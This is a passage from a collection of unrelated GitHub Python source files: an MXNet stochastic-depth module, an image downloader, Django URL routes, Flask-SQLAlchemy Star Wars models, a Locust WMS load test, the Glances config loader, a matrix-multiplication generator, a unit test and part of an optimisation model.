is_train:\n self._gate_open = self._rnd_queue.get_sample() < self._open_rate\n if self._gate_open:\n self._module_compute.forward(data_batch, is_train=True)\n computed_outputs = self._module_compute.get_outputs()\n for i in range(len(self._outputs)):\n self._outputs[i] += computed_outputs[i]\n\n else: # do expectation for prediction\n self._module_compute.forward(data_batch, is_train=False)\n computed_outputs = self._module_compute.get_outputs()\n for i in range(len(self._outputs)):\n self._outputs[i] += self._open_rate * computed_outputs[i]\n\n def backward(self, out_grads=None):\n if self._module_skip:\n self._module_skip.backward(out_grads=out_grads)\n self._input_grads = self._module_skip.get_input_grads()\n else:\n self._input_grads = out_grads\n\n if self._gate_open:\n self._module_compute.backward(out_grads=out_grads)\n computed_input_grads = self._module_compute.get_input_grads()\n for i in range(len(self._input_grads)):\n self._input_grads[i] += computed_input_grads[i]\n\n def update(self):\n self._module_compute.update()\n if self._module_skip:\n self._module_skip.update()\n\n def update_metric(self, eval_metric, labels):\n self._module_compute.update_metric(eval_metric, labels)\n if self._module_skip:\n self._module_skip.update_metric(eval_metric, labels)\n\n def get_outputs(self, merge_multi_context=True):\n assert merge_multi_context, \"Force merging for now\"\n return self._outputs\n\n def get_input_grads(self, merge_multi_context=True):\n assert merge_multi_context, \"Force merging for now\"\n return self._input_grads\n","repo_name":"hpi-xnor/BMXNet","sub_path":"example/stochastic-depth/sd_module.py","file_name":"sd_module.py","file_ext":"py","file_size_in_byte":6525,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"37"} +{"seq_id":"71111485226","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2019-09-09 06:23:33\n# @Author : 小戴 (408366645@qq.com)\n# @Link : http://www.phpet.com/\n# @Version : $Id$\n\nfrom urllib.request import urlretrieve\nimport urllib\nimport os\nimport time\nimport pdb\nimport socket\nimport logging\n\ndef logginconfig():\n logging.basicConfig(level=logging.DEBUG,#控制台打印的日志级别\n filename='new.log',\n filemode='a',##模式,有w和a,w就是写模式,每次都会重新写日志,覆盖之前的日志\n #a是追加模式,默认如果不写的话,就是追加模式\n format='%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s'#日志格式\n )\n\n\ndef loglist(file,data,mode='a'):\n f = open(file,mode)\n f.write(data+\"\\n\")\n f.close()\ndef download(url,filename):\n socket.setdefaulttimeout(60)\n #pdb.set_trace() # 运行到这里会自动暂停\n try:\n opener = urllib.request.build_opener()\n opener.addheaders = [('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1941.0 Safari/537.36')]\n urllib.request.install_opener(opener)\n #urlretrieve(url = url,filename = filename)\n urllib.request.urlretrieve(url = url,filename = filename)\n except socket.timeout:\n count = 1\n while count <= 5:\n try:\n urlretrieve(url = url,filename = filename)\n break\n except socket.timeout:\n err_info = 'Reloading for %d time'%count if count == 1 else 'Reloading for %d times'%count\n print(err_info)\n print('timeout-url:'+url)\n count += 1\n if count > 5:\n print('url:'+url)\n print(\"downloading picture fialed!\")\n except Exception as e:\n print('other-url1:'+url)\n print('捕捉到其他异常')\n logging.exception(e)\n count = 1\n while count <= 3:\n try:\n #urlretrieve(url = url,filename = filename)\n opener = urllib.request.build_opener()\n opener.addheaders = [('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1941.0 Safari/537.36')]\n urllib.request.install_opener(opener)\n #urlretrieve(url = url,filename = filename)\n urllib.request.urlretrieve(url = url,filename = filename)\n break\n except:\n err_info = '捕捉到其他异常:Reloading for %d time'%count if count == 1 else '捕捉到其他异常:Reloading for %d times'%count\n print(err_info)\n count += 1\n if count > 3:\n print('other-url2:'+url)\n print(\"downloading fialed!\")\n\n# 对重编码的网址下载图片\n# def down(outs, folder_path):\n# global x\n# for out in outs:\n# # 获取新编码的URL地址\n# res = requests.get(out)\n# # 防止被反爬,打开后关闭\n# res.close()\n# bf = BytesIO()\n# bf.write(res.content)\n# img = Image.open(bf)\n# print(f'正在下载第{x}张图片')\n# img.save(folder_path + f\"{x}.jpg\")\n# x += 1\n\n# 对获取的图片源网址进行重编码\ndef bianma(results):\n outs = []\n for s in results:\n # 用正则筛选出中文部分\n pattern = re.compile('[\\u4e00-\\u9fa5]+')\n result = re.search(pattern, s)\n su = result.group(0)\n # 把中文部分重洗编码\n li = urllib.parse.quote(su)\n # 把原URL地址中文部分替换成编码后的\n out = re.sub(pattern, li, s)\n outs.append(out)\n # 对列表进行去重并且按照原来的次序排列\n outs_cp = sorted(set(outs), key=outs.index)\n return outs_cp\n# 获取抓取的图片源网址\ndef crawl(url, header):\n res = requests.get(url, headers=header)\n # 防止被反爬,打开后关闭\n res.close()\n res = res.text\n pattern = re.compile('http.*?apic.*?jpg')\n result = re.findall(pattern, res)\n return result\n","repo_name":"daiwy1016/python-spider","sub_path":"python_lib/BaseCommon.py","file_name":"BaseCommon.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7130432301","text":"\"\"\"main_project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom . import views\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\nurlpatterns = [\n path(\"\", views.IndexView.as_view(), name=\"home\"),\n path(\"3-months/\", views.month_3.as_view(), name=\"m3\"),\n path(\"6-months/\", views.month_6.as_view(), name=\"m6\"),\n path(\"9-months/\", views.month_9.as_view(), name=\"m9\"),\n path('admin/', admin.site.urls),\n path(\"accounts/\", include(\"accounts.urls\"), name=\"accounts\"),\n path('accounts/', include(\"django.contrib.auth.urls\")),\n path(\"expense/\", include(\"expense.urls\"), name=\"expense\"),\n path(\"income/\", include(\"income.urls\"), name=\"income\"),\n path(\"transaction/\", include(\"transaction.urls\"), name=\"transaction\")\n]\nurlpatterns += staticfiles_urlpatterns()\n","repo_name":"MjRauff/user_app","sub_path":"main_project/main_project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24997423001","text":"from flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy()\n\n### user uno a muchos (characters, vehicles y planets FAVS)\nclass User(db.Model):\n __tablename__ = 'users'\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(100), nullable=False, unique=True)\n password = db.Column(db.String(100), nullable=False)\n\n favorites = db.relationship('Favorites', cascade = 'all, delete', backref = 'user', uselist = False)\n\n ## metodo para guardar en base de dato\n def save(self):\n db.session.add(self)\n db.session.commit()\n #update base de dato de user\n def update(self):\n db.session.commit()\n #delete en base de dato\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def check_password(self, password):\n return safe_str_cmp()\n\n #se encarga de devolver mi objeto de python en un obj serializable\n def serialize(self):\n return {\n \"id\": self.id,\n \"username\": self.username,\n # password no va por prevencion de privacidad\n }\n\n ## CONEXION A ALL FAVORITOS \n def serialize_user_with_favorite(self):\n return {\n \"id\": self.id,\n \"username\": self.username,\n \"favorites\": {\n \"characters\": self.favorites.characters.serialize(),\n \"planets\": self.favorites.planets.serialize(),\n \"vehicles\": self.favorites.vehicles.serialize()\n }\n }\n\n########\n\n\n\n\n# TABLA GENERAL FAVORITOS\nclass Favorites(db.Model):\n __tablename__ = 'favorites'\n ## ID TABLA\n id = db.Column(db.Integer, primary_key=True)\n users_id = db.Column(db.Integer, db.ForeignKey('users.id', ondelete='CASCADE'), nullable=False)\n\n ## RELACION CON LA TABLA ALL_FAVS a TABLAS PIVOTTE CON CHARACTERS, PLANETS y VEHICLES\n characters = db.relationship('Characters', secondary='favorites_characters')\n planets = db.relationship('Planets', secondary='favorites_planets')\n vehicles = db.relationship('Vehicles', secondary='favorites_vehicles')\n\n def save(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def serialize(self):\n return {\n \"id\": self.id,\n \"user\": {\n \"id\":self.user.id,\n \"username\": self.user.username\n },\n \"characters\": self.get_fav_characters(),\n \"planets\": self.get_fav_planets(),\n \"vehicles\": self.get_fav_vehicles()\n }\n \n def get_fav_characters(self):\n return list(map(lambda characters: characters.serialize(), self.characters))\n \n def get_fav_planets(self):\n return list(map(lambda planets: planets.serialize(), self.planets))\n\n def get_fav_vehicles(self):\n return list(map(lambda vehicles: vehicles.serialize(), self.vehicles)) \n\n\n\n######### ------<\n\n\n\n#######\n# TABLAS PIVOTTE\nclass Favorites_Characters(db.Model):\n __tablename__ = 'favorites_characters'\n id_favorites = db.Column(db.Integer, db.ForeignKey('favorites.id'), primary_key=True)\n characters_id = db.Column(db.Integer, db.ForeignKey('characters.id'), primary_key=True)\n\n########\n\nclass Favorites_Planets(db.Model):\n __tablename__ = 'favorites_planets'\n id_favorites = db.Column(db.Integer, db.ForeignKey('favorites.id'), primary_key=True)\n planets_id = db.Column(db.Integer, db.ForeignKey('planets.id'), primary_key=True)\n \n###########\n\nclass Favorites_Vehicles(db.Model):\n __tablename__ = 'favorites_vehicles'\n id_favorites = db.Column(db.Integer, db.ForeignKey('favorites.id'), primary_key=True)\n vehicles_id = db.Column(db.Integer, db.ForeignKey('vehicles.id'), primary_key=True)\n\n########\n\n\n\n\n## >--------\n# MUCHOS CHARACTERS\nclass Characters(db.Model):\n __tablename__ = 'characters'\n id = db.Column(db.Integer, primary_key=True) \n name = db.Column(db.String(250), nullable=False)\n gender = db.Column(db.String(250), nullable=False)\n height = db.Column(db.String(250), nullable=False)\n mass = db.Column(db.String(100), nullable=False)\n hair_color = db.Column(db.String(250), nullable=False)\n skin_color = db.Column(db.String(100), nullable=False)\n eye_color = db.Column(db.String(100), nullable=False)\n birth_year = db.Column(db.String(100), nullable=False)\n homeworld = db.Column(db.String(100), nullable=False)\n #Link tabla pivotte\n favorites = db.relationship('Favorites', secondary='favorites_characters', backref='character')\n\n def save(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def serialize(self):\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"gender\": self.gender,\n \"height\": self.height,\n \"mass\": self.mass,\n \"hair_color\": self.hair_color,\n \"skin_color\": self.skin_color,\n \"eye_color\": self.eye_color,\n \"birth_year\": self.birth_year,\n \"homeworld\": self.homeworld,\n }\n#########\n\n\n########\nclass Planets(db.Model):\n __tablename__ = 'planets'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(250), nullable=False)\n diameter = db.Column(db.String(250), nullable=False)\n rotation_period = db.Column(db.String(100), nullable=False)\n orbital_period = db.Column(db.String(100), nullable=False)\n gravity = db.Column(db.String(100), nullable=False)\n population = db.Column(db.String(250), nullable=False)\n climate = db.Column(db.String(250), nullable=False)\n terrain = db.Column(db.String(250), nullable=False)\n surface_water = db.Column(db.String(100), nullable=False)\n favorites = db.relationship('Favorites', secondary='favorites_planets', backref='planet')\n\n def save(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def serialize(self):\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"diameter\": self.diameter,\n \"rotation_period\": self.rotation_period,\n \"orbital_period\": self.orbital_period,\n \"gravity\": self.gravity,\n \"population\": self.population,\n \"climate\": self.climate,\n \"terrain\": self.terrain,\n \"surface_water\": self.surface_water,\n }\n#########\n\nclass Vehicles(db.Model):\n __tablename__ = 'vehicles'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(250), nullable=False)\n model = db.Column(db.String(250), nullable=False)\n starship_class = db.Column(db.String(250), nullable=False)\n manufacturer = db.Column(db.String(250), nullable=False)\n cost_in_credits = db.Column(db.String(250), nullable=False)\n length = db.Column(db.String(250), nullable=False)\n crew = db.Column(db.String(250), nullable=False)\n passengers = db.Column(db.String(250), nullable=False)\n max_armosphering_speed = db.Column(db.String(250), nullable=False)\n hyperdrive_rating = db.Column(db.String(250), nullable=False)\n cargo_capacity = db.Column(db.String(250), nullable=False)\n consumables = db.Column(db.String(250), nullable=False)\n pilots = db.Column(db.String(250), nullable=False)\n favorites = db.relationship('Favorites', secondary='favorites_vehicles', backref='vehicle')\n\n\n def save(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def serialize(self):\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"model\": self.model,\n \"starship_class\": self.starship_class,\n \"manufacturer\": self.manufacturer,\n \"cost_in_credits\": self.cost_in_credits,\n \"length\": self.length,\n \"passengers\": self.passengers,\n \"max_armosphering_speed\": self.max_armosphering_speed,\n \"hyperdrive_rating\": self.hyperdrive_rating,\n \"cargo_capacity\": self.cargo_capacity,\n \"consumables\": self.consumables,\n \"pilots\": self.pilots,\n }\n\n\n","repo_name":"Lucas-VY/rest-api-starwars-flask-sqlalchemy","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31166201001","text":"import random\nimport math\nfrom locust import HttpLocust, TaskSet, task\nfrom lxml import etree\n\n\nclass WMSLayer(object):\n def __init__(self, xml_el):\n #print(etree.tostring(xml_el))\n self.name = xml_el.find('Name').text\n self.bbox = dict(xml_el.find('BoundingBox').attrib.items())\n for n in ['minx', 'maxx', 'maxy', 'miny']:\n self.bbox[n] = float(self.bbox[n])\n self.width = self.bbox['maxx'] - self.bbox['minx']\n self.height = self.bbox['maxy'] - self.bbox['miny']\n\n\nclass WMSTaskSet(TaskSet):\n default_params = {\n 'service': 'wms',\n 'version': '1.1.1',\n }\n\n def on_start(self):\n url_params = self.default_params.copy()\n url_params.update({\n 'request': 'GetCapabilities'\n })\n resp = self.client.get(\"/wms\", params=url_params, catch_response=True)\n content_type = resp.headers['content-type']\n assert content_type == 'application/vnd.ogc.wms_xml'\n\n root = etree.fromstring(resp.content)\n layers = root.xpath('//Capability/Layer/Layer')\n assert len(layers) > 0\n\n self.layers = [WMSLayer(el) for el in layers]\n #for l in self.layers:\n # print l.name\n\n @task\n def get_map(self, layer=None):\n if not layer:\n possible_layers = ['hel:Karttasarja']\n layers = [l for l in self.layers if l.name in possible_layers]\n layer = random.choice(layers)\n\n dim = 256\n img_fmt = 'image/jpeg'\n\n url_params = self.default_params.copy()\n url_params.update({\n 'request': 'GetMap',\n 'layers': layer.name,\n 'styles': '',\n 'srs': layer.bbox['SRS'],\n 'width': dim,\n 'height': dim,\n 'format': img_fmt,\n })\n\n # min spatial resolution 5cm\n min_res = 0.05\n max_res = min(layer.height, layer.width) / dim\n max_exp = math.log(max_res / min_res, 2)\n exp = random.randint(0, int(max_exp))\n res = min_res * 2**exp\n\n minx = random.uniform(layer.bbox['minx'], layer.bbox['maxx'] - res * dim)\n miny = random.uniform(layer.bbox['miny'], layer.bbox['maxy'] - res * dim)\n #max_res = min(layer.bbox['maxx'] - minx, layer.bbox['maxy'] - miny)\n #max_res /= dim\n\n maxx = minx + res * dim\n maxy = miny + res * dim\n bbox = [str(f) for f in [minx, miny, maxx, maxy]]\n url_params['bbox'] = ','.join(bbox)\n\n name = 'WMS-GetMap-%s' % layer.name\n name += '-%6sm' % ('%.2f' % res)\n args = dict(params=url_params, name=name, catch_response=True)\n with self.client.get(\"/wms\", **args) as resp:\n #print(resp.request.url)\n\n if resp.status_code != 200:\n print(\"status %d\" % resp.status_code)\n print(resp.request.url)\n return\n if resp.headers['content-type'] != img_fmt:\n resp.failure('Invalid content type')\n print(\"content type: %s\" % resp.headers['content-type'])\n print(resp.request.url)\n print(resp.content)\n return\n f = open('/tmp/locust/%s.png' % name, 'w')\n f.write(resp.content)\n f.close()\n\n\nclass WMSBench(HttpLocust):\n task_set = WMSTaskSet\n host = \"http://geoserver.hel.fi/geoserver\"\n\n # we assume someone who is browsing the Locust docs,\n # generally has a quite long waiting time (between\n # 20 and 600 seconds), since there's a bunch of text\n # on each page\n min_wait = 0\n #max_wait = 600 * 1000\n","repo_name":"City-of-Helsinki/owsbench","sub_path":"locustfile.py","file_name":"locustfile.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24275037012","text":"from algebreb.listas.listas_polinomios import ListaTermPolinomio\nfrom sympy.abc import a, b, c, x, y , z\nimport json\n\ncaracteristicas = {}\ncaracteristicas['cantidad'] = 10\ncaracteristicas['variables'] = [a]\ncaracteristicas['dominio'] = 'QQ'\ncaracteristicas['fraccion'] = False\ncaracteristicas['gmin'] = 1\ncaracteristicas['gmax'] = 2\ncaracteristicas['cmin'] = -10\ncaracteristicas['cmax'] = 10\ncaracteristicas['completo'] = False\n\nlsp = ListaTermPolinomio(caracteristicas)\njson_object = json.dumps(lsp.as_str_latex(), indent=4)\nprint(json_object)","repo_name":"ialdaverag/algebreb","sub_path":"algebreb/listas/ejemplos/listas_polinomios/lista_term_polinomios.py","file_name":"lista_term_polinomios.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31097199752","text":"import os\nimport sys\ntry:\n from configparser import RawConfigParser\n from configparser import NoOptionError\nexcept ImportError: # Python 2\n from ConfigParser import RawConfigParser\n from ConfigParser import NoOptionError\n\n# Import Glances lib\nfrom glances.core.glances_globals import (\n appname,\n is_bsd,\n is_linux,\n is_mac,\n is_py3,\n is_windows,\n sys_prefix,\n work_path\n)\nfrom glances.core.glances_logging import logger\n\n\nclass Config(object):\n\n \"\"\"This class is used to access/read config file, if it exists.\n\n :param location: the custom path to search for config file\n :type location: str or None\n \"\"\"\n\n def __init__(self, location=None):\n self.location = location\n\n self.config_filename = 'glances.conf'\n\n self.parser = RawConfigParser()\n\n self._loaded_config_file = None\n self.load()\n\n def load(self):\n \"\"\"Load a config file from the list of paths, if it exists.\"\"\"\n for config_file in self.get_config_paths():\n if os.path.isfile(config_file) and os.path.getsize(config_file) > 0:\n try:\n if is_py3:\n self.parser.read(config_file, encoding='utf-8')\n else:\n self.parser.read(config_file)\n logger.info(\"Read configuration file '{0}'\".format(config_file))\n except UnicodeDecodeError as e:\n logger.error(\"Cannot decode configuration file '{0}': {1}\".format(config_file, e))\n sys.exit(1)\n # Save the loaded configuration file path (issue #374)\n self._loaded_config_file = config_file\n break\n\n def get_loaded_config_file(self):\n \"\"\"Return the loaded configuration file\"\"\"\n return self._loaded_config_file\n\n def get_config_paths(self):\n r\"\"\"Get a list of config file paths.\n\n The list is built taking into account of the OS, priority and location.\n\n * running from source: /path/to/glances/conf\n * per-user install: ~/.local/etc/glances (Unix-like only)\n * Linux: ~/.config/glances, /etc/glances\n * BSD: ~/.config/glances, /usr/local/etc/glances\n * Mac: ~/Library/Application Support/glances, /usr/local/etc/glances\n * Windows: %APPDATA%\\glances\n\n The config file will be searched in the following order of priority:\n * /path/to/file (via -C flag)\n * /path/to/glances/conf\n * user's local directory (per-user install settings)\n * user's home directory (per-user settings)\n * {/usr/local,}/etc directory (system-wide settings)\n \"\"\"\n paths = []\n conf_path = os.path.realpath(\n os.path.join(work_path, '..', '..', 'conf'))\n\n if self.location is not None:\n paths.append(self.location)\n\n if os.path.exists(conf_path):\n paths.append(os.path.join(conf_path, self.config_filename))\n\n if not is_windows:\n paths.append(os.path.join(os.path.expanduser('~/.local'), 'etc', appname, self.config_filename))\n\n if is_linux or is_bsd:\n paths.append(os.path.join(\n os.environ.get('XDG_CONFIG_HOME') or os.path.expanduser(\n '~/.config'),\n appname, self.config_filename))\n if hasattr(sys, 'real_prefix') or is_bsd:\n paths.append(\n os.path.join(sys.prefix, 'etc', appname, self.config_filename))\n else:\n paths.append(\n os.path.join('/etc', appname, self.config_filename))\n elif is_mac:\n paths.append(os.path.join(\n os.path.expanduser('~/Library/Application Support/'),\n appname, self.config_filename))\n paths.append(os.path.join(\n sys_prefix, 'etc', appname, self.config_filename))\n elif is_windows:\n paths.append(os.path.join(\n os.environ.get('APPDATA'), appname, self.config_filename))\n\n return paths\n\n def items(self, section):\n \"\"\"Return the items list of a section.\"\"\"\n return self.parser.items(section)\n\n def has_section(self, section):\n \"\"\"Return info about the existence of a section.\"\"\"\n return self.parser.has_section(section)\n\n def get_option(self, section, option):\n \"\"\"Get the float value of an option, if it exists.\"\"\"\n try:\n value = self.parser.getfloat(section, option)\n except NoOptionError:\n return\n else:\n return value\n\n def get_raw_option(self, section, option):\n \"\"\"Get the raw value of an option, if it exists.\"\"\"\n try:\n value = self.parser.get(section, option)\n except NoOptionError:\n return\n else:\n return value\n","repo_name":"kojitaniguchi/isucon-summer","sub_path":"usr/lib/python3/dist-packages/glances/core/glances_config.py","file_name":"glances_config.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6748788557","text":"'''\n Scripts creates matrices in c format and prints the reference result\n of General Matrix Multiplication\n \n usage: python gemm.py \n'''\n\nfrom pprint import pprint\nimport numpy as np\nimport sys\nimport os\n\nSIZE = 16\nRANGE = 100\nALPHA = 1\nBETA = 2\n\ndef print_Cformat(A, name=\"a\"):\n print(\"mat_t \" + name + \"[SIZE][SIZE] = \", end=\"\")\n print(\"{\", end=\"\")\n for i in range(0, A.shape[0]):\n print(\"{\", end=\"\")\n for j in range(0, A.shape[1]):\n if j != A.shape[1] - 1:\n print(f\"{A[i][j]}, \", end = \"\")\n else:\n print(A[i][-1], end=\"\")\n if i != A.shape[0] - 1:\n print(\"},\")\n else:\n print(\"}\", end=\"\")\n print(\"};\")\n print()\n \ndef cls():\n os.system('cls' if os.name=='nt' else 'clear')\n\ndef gemm(a, b, c, a1, b1):\n tmp = np.matmul(a,b)\n tmp = a1 * tmp\n c = b1 * c\n return tmp + c\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 5:\n SIZE = int(sys.argv[1])\n RANGE = int(sys.argv[2])\n ALPHA = int(sys.argv[3])\n BETA = int(sys.argv[4])\n\n # now, to clear the screen\n cls()\n\n a = np.random.randint(0, RANGE, size=(SIZE,SIZE))\n b = np.random.randint(0, RANGE, size=(SIZE,SIZE))\n #c = np.zeros((SIZE, SIZE), dtype=int)\n c = np.random.randint(0, RANGE, size=(SIZE,SIZE))\n\n a1 = ALPHA\n b1 = BETA\n\n print_Cformat(a, name=\"a\")\n print_Cformat(b, name=\"b\")\n print_Cformat(c, name=\"c\")\n print(f\"mat_t a1 = {a1};\")\n print(f\"mat_t b1 = {b1};\")\n ref = gemm(a, b, c, a1, b1)\n print_Cformat(ref, name=\"ref\")","repo_name":"Matjaz12/GEMM-FPGA","sub_path":"gemm.py","file_name":"gemm.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21422222008","text":"import builtins\nfrom io import TextIOWrapper\n\nimport pytest\nfrom mockito import mock, unstub, when, kwargs, ANY, verify\n\nfrom wg_federation.data_transformation.saver.file.text_file_configuration_saver import \\\n TextFileConfigurationSaver\n\n\n# pylint: disable=duplicate-code\n\n\nclass TestTextFileConfigurationSaver:\n \"\"\" Test TextFileConfigurationSaver class \"\"\"\n\n _file = None\n _non_exist_parent_path = None\n\n _pathlib_lib = None\n _os_lib = None\n _subject: TextFileConfigurationSaver = None\n\n @pytest.fixture(autouse=True)\n def run_around_tests(self):\n \"\"\" Resets mock between tests \"\"\"\n unstub()\n self.setup_method()\n\n def setup_method(self):\n \"\"\" Constructor \"\"\"\n\n self._file = mock(spec=TextIOWrapper)\n # pylint: disable=unnecessary-dunder-call\n when(self._file).__enter__().thenReturn(self._file)\n when(self._file).__exit__(...).thenReturn(None)\n when(self._file).truncate(ANY).thenReturn(None)\n when(self._file).write(ANY).thenReturn(None)\n\n _exist_path = mock()\n when(_exist_path).exists().thenReturn(True)\n\n self._non_exist_parent_path = mock()\n when(self._non_exist_parent_path).mkdir(...)\n\n _non_exist_path = mock({'parents': [self._non_exist_parent_path]})\n when(_non_exist_path).exists().thenReturn(False)\n\n self._pathlib_lib = mock()\n when(self._pathlib_lib).Path(...).thenReturn(_exist_path)\n when(self._pathlib_lib).Path('unknown.digest').thenReturn(_non_exist_path)\n\n self._os_lib = mock({'linesep': 'line'})\n\n when(builtins).open(...).thenCallOriginalImplementation()\n when(builtins).open(file='destination.digest', **kwargs).thenReturn(self._file)\n\n self._subject = TextFileConfigurationSaver(pathlib_lib=self._pathlib_lib, os_lib=self._os_lib)\n\n def test_init(self):\n \"\"\" it can be instantiated \"\"\"\n assert isinstance(self._subject, TextFileConfigurationSaver)\n\n def test_supports(self):\n \"\"\" it returns whether it supports a source or not \"\"\"\n assert True is self._subject.supports({}, '/path/to/file.DIGEST')\n assert True is self._subject.supports({}, 'file.sig')\n assert True is self._subject.supports({}, '/path/to/file.sha512')\n assert True is self._subject.supports({}, '/path/to/file.sha')\n assert False is self._subject.supports({}, '.md5')\n\n def test_supports2(self):\n \"\"\" it returns it does not support types that are not strings or file handlers \"\"\"\n assert False is self._subject.supports({}, b'invalid_bytes')\n\n def test_save_to(self):\n \"\"\" it can save configuration to a valid file destination \"\"\"\n self._subject.save_to({'signature_data': 'sign'}, self._file)\n\n verify(self._file, times=1).truncate(0)\n verify(self._file, times=1).write('sign')\n\n def test_save_to2(self):\n \"\"\" it can save configuration to a valid path destination \"\"\"\n self._subject.save_to({'signature_data': 1}, 'destination.digest')\n\n verify(self._file, times=1).truncate(0)\n verify(self._file, times=1).write('1')\n\n def test_is_initialized(self):\n \"\"\" it returns whether the destination/data is initialized \"\"\"\n assert self._subject.is_initialized({}, 'destination.digest')\n\n def test_is_initialized2(self):\n \"\"\" it returns when it is not initialized because the file does not exist \"\"\"\n assert not self._subject.is_initialized({}, 'unknown.digest')\n\n def test_initialize(self):\n \"\"\" it initializes \"\"\"\n self._subject.initialize({}, 'unknown.digest')\n\n verify(self._non_exist_parent_path, times=1).mkdir(...)\n","repo_name":"gui-don/python-wg-federation","sub_path":"tests/unit/wg_federation/data_transformation/saver/file/test_text_file_configuration_saver.py","file_name":"test_text_file_configuration_saver.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10672376760","text":"import solvers.model_anor as model\nimport copy\nimport pytups.tuplist as tl\nimport pytups.superdict as sd\n\n\nclass ModelANORFixLP(model.ModelANOR):\n \"\"\"\n 1. Solve LP\n 2. Get periods where the m_it > 0\n 3. Only use those for MILP\n \"\"\"\n\n def solve(self, options=None):\n my_options = copy.deepcopy(options)\n my_options['relax'] = True\n relaxed_solution = model.ModelANOR.solve(self, my_options)\n l = self.domains\n if relaxed_solution is None:\n return None\n\n # we get non-zero maintenance variables\n l['at_start_maint'] = at_free_start = \\\n sd.SuperDict.from_dict(self.start_M).\\\n vfilter(lambda v: v.value()).\\\n keys_tl()\n\n # we filter the domains corresponding to the maintenance variables values.\n # this part we have copied it from the get_domains_sets method from the model.Model object\n # this is the TTT_t set.\n # periods that are maintenance periods because of having assign a maintenance\n ret_init = self.instance.get_initial_state(\"elapsed\")\n first_period, last_period = self.instance.get_start_end()\n param_data = self.instance.get_param()\n duration = param_data['maint_duration']\n max_elapsed = param_data['max_elapsed_time'] + duration\n min_elapsed = max_elapsed - param_data['elapsed_time_size']\n ret_init_adjusted = {k: v - max_elapsed + min_elapsed for k, v in ret_init.items()}\n periods = self.instance.get_periods_range(first_period, last_period)\n p_pos = {periods[pos]: pos for pos in range(len(periods))}\n resources = self.instance.get_resources()\n min_elapsed_2M = {r: min_elapsed for r in resources}\n max_elapsed_2M = {r: max_elapsed for r in resources}\n\n l['at_M_ini'] = at_M_ini = tl.TupList([(a, t) for (a, t) in at_free_start\n if ret_init_adjusted[a] <= p_pos[t] <= ret_init[a]\n ])\n l['t_a_M_ini'] = at_M_ini.to_dict(result_col=1, is_list=True)\n l['att'] = att = tl.TupList([(a, t1, t2) for (a, t1) in at_free_start for t2 in periods\n if (p_pos[t1] <= p_pos[t2] < p_pos[t1] + duration)\n and (a, t2) in at_free_start])\n l['at1_t2'] = at1_t2 = att.to_dict(result_col=[0, 1], is_list=True)\n l['t2_at1'] = t2_at1 = att.to_dict(result_col=2, is_list=True)\n l['t_a_M_ini'] = t_a_M_ini = at_M_ini.to_dict(result_col=1, is_list=True)\n l['att_m'] = att_m = tl.TupList([(a, t1, t2) for (a, t1) in at_free_start for t2 in periods\n if (p_pos[t1] < p_pos[t2] < p_pos[t1] + min_elapsed) and (a, t2) in at_free_start\n ])\n l['att_maints_no_last'] = att_maints_no_last = \\\n tl.TupList((a, t1, t2) for (a, t1) in at_M_ini for t2 in periods\n if (p_pos[t1] + min_elapsed_2M[a] <= p_pos[t2] < p_pos[t1] + max_elapsed_2M[a])\n and len(periods) <= p_pos[t2] + max_elapsed\n and t2 < last_period\n and (a, t2) in 